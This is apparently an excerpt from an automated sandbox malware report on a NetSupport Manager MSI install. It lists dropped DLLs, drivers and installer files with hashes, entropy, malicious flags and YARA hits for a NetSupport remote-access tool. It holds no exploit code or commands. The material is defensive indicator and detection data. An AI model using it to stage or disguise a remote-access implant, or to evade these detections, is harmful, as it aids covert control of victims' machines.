                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF1A9.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF1F8.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF238.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF2D5.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF314.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF373.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF691.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4973346
                                                                                      Entropy (8bit):6.51926002625642
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:SgAesgAelgAeHcqMOfhRTcqMOfWR6gAeAcqMOf3:SOsOlOE4h+4WkO/43
                                                                                      MD5:F93A3FB6A98D8E2A35977951AB36650C
                                                                                      SHA1:8B312DBC8A059C539F2FAC87A19212B13802BBB9
                                                                                      SHA-256:31F06B3C77ADC1A0C6356E670D0F2B06BE8DE2256497128D4ADC2933B9644E65
                                                                                      SHA-512:925BC858D59CD7205D27D49F9287A85371E4C72E171F3E2841CC00893265E5CD7F6462028975F52F2B8289FFA63D21F38CC9134ABDC144E976D15DFCACD1BA70
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF6C1.tmp, Author: Joe Security
                                                                                      Preview:...@IXOS.@.....@..vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopDrivers....J...StopDrivers.@A.........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rda
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                      MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                      SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                      SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                      SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                      Malicious:true
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF869.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF8D7.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF917.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF985.tmp, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                      MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                      SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                      SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                      SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                      Malicious:true
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):1.1624961454168947
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:JSbX72FjCAGiLIlHVRpzh/7777777777777777777777777vDHFVBfHIxVYOp01z:JUQI53hoxyN8F
                                                                                      MD5:E7D0F5F2A9CBE17BABA6A76F207883A6
                                                                                      SHA1:80081546AE688F3FAD7033614CB89C3B82AEC9B7
                                                                                      SHA-256:4CBFFADE3F8C2606A1D85F681CF4693719325847BB3BF468148658EE5CF969B6
                                                                                      SHA-512:0B4CBF0259053F5BA90F57A94900EDD2AD59FB6EBB874B9D71DF043CD81B817FBC3517F3CAFA16F32676F7F1BE913522CC73FB2B7558ECF72FA42FDA69B00EF9
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\e6def7.msi, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\e6defa.msi, Author: Joe Security
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):24576
                                                                                      Entropy (8bit):2.2143805252812587
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:UhC1rnTTPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:f1j3Ub3Ck1EWfKMQqY/
                                                                                      MD5:EDE71E88544444AEDB0A1054744C5D3B
                                                                                      SHA1:95CB9FC98ABD9933DFA91973830F4804CC4E5A36
                                                                                      SHA-256:55BD9FAB938F637FF1161C6641408E5DFD33CBE6C7A543419B32EA930F8FB328
                                                                                      SHA-512:EB209EADB32BB29C1CCB7E7240743E29FB4C888DD76F42C9FD9B3361CC8A77669A8334C3FAEDC2811D192423376DCCB08E129CC8E672C2B26965C33C131015D0
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):144128
                                                                                      Entropy (8bit):4.98417021664642
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:DMAyYdTmPJbgqcnDcVVZl6FhWr80/35qr2pe/kyNAMxkEe:D1U81c50hGv5Kee/k4x6
                                                                                      MD5:EEA96B9571108A588FB0DBC47DB9F8BE
                                                                                      SHA1:3DD69D11C3023FDD9429658BA25995950781E575
                                                                                      SHA-256:D324F2C1E8697197152BC2E4E8AA67F8660B3B93887A754AEC81791377EF1045
                                                                                      SHA-512:760749F298E7E2C8E081B4A436EA1185B6366E53A5B91640061EA73A9C0AC33AB385BD0588B9886F80F695B297BA46FFC58B3BDE0DD2BC9AEA127FDDCBC0C624
                                                                                      Malicious:true
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1014517
                                                                                      Entropy (8bit):5.410941472702708
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:TFfxq8RfKF0Dux6lvJ3c7v/3dd7kGcoyq+HaRgEM:TFfxq8xKCE6lVcbP7kGcjaRgEM
                                                                                      MD5:6A9703C8ED1D37644EBE45D3FE22D5A2
                                                                                      SHA1:A05425BCD7C6FCB7D73E69452DBA9156926E93A0
                                                                                      SHA-256:53020D58965449A8EC4EB83DF989FFFF7B06BD6840DAA8F3F3CF2EB8C3651684
                                                                                      SHA-512:FD8179934579E5B569AFCC725EB2B795A082A16F276D4D5A7B4F19B76BED5466C3DE27A14F00DD7ED986D95DFA4A7ED49E3CEA69DCF4FA6162377EA0C66C65A6
                                                                                      Malicious:false
                                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 09:59:37.236 [4684]: Command line: D:\wd\compilerTemp\BMT.i51yo0aa.beh\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 09:59:37.255 [4684]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 09:59:37.299 [4684]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 09:59:37.299 [4684]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 09:59:37.299 [
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):56288
                                                                                      Entropy (8bit):5.934323135362062
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                      MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                      SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                      SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                      SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                      Malicious:true
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):104928
                                                                                      Entropy (8bit):6.462496520992136
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                      MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                      SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                      SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                      SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\System32\client32provider.dll, Author: Joe Security
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33408
                                                                                      Entropy (8bit):6.382369861010622
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                      MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                      SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                      SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                      SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\System32\drivers\nskbfltr.sys, Author: Joe Security
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34008
                                                                                      Entropy (8bit):6.39207103344199
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                      MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                      SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                      SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                      SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                      Malicious:true
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):1.4320464191386586
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/KHHT38vUuPQDkcr+kHfhIWbrAinC2f109effKMuOk9rqvktfhWbrArXP:yHHzgUb3Ck1EWfKMQqY/
                                                                                      MD5:E2A16A16EEBB509A3F2837A5ADDE0EC2
                                                                                      SHA1:9BFC3F8B2F5C95A2BC0279AE8F5EF55E4B5813E3
                                                                                      SHA-256:F55354AAFB6554143F11BA4EB5C547F05E27CCE44DF17064527C401DFB3952F0
                                                                                      SHA-512:BA355CED15827C655D7A1326F2BE70F4D761B3BD9E141E07F87F247FD8B8ACCF7635B1B45D76F373622450E49DB4D6F79BDBB9399E66D6D509BDCA0BA215B64A
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
